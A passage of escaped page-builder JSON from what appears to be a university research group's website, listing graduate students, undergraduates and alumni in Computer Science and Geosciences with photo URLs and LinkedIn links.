Science<br><\\/p>\"},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c79\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c111\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c111\",\"index\":2,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c111\",\"index\":3,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c105\",\"index\":1,\"id\":\"182-c110\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c201\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c201\",\"index\":2,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c201\",\"index\":3,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c201\",\"index\":1,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c62\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c61\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c130\",\"parentId\":\"182-c129\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c129\",\"parentId\":\"182-c128\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c128\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c133\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c134\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c133\",\"index\":2,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c133\",\"index\":1,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c207\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c207\",\"index\":0,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c207\",\"index\":0,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c207\",\"index\":2,\"id\":\"182-c210\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c207\",\"index\":1,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c132\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c131\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c140\",\"parentId\":\"182-c139\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c139\",\"parentId\":\"182-c138\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c138\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c143\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c143\",\"index\":2,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c143\",\"index\":1,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c148\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c150\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c148\",\"index\":2,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c148\",\"index\":1,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c153\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c153\",\"index\":2,\"id\":\"182-c156\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c153\",\"index\":1,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c158\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c158\",\"index\":2,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c158\",\"index\":1,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c163\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c163\",\"index\":2,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c163\",\"index\":1,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c168\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c168\",\"index\":2,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 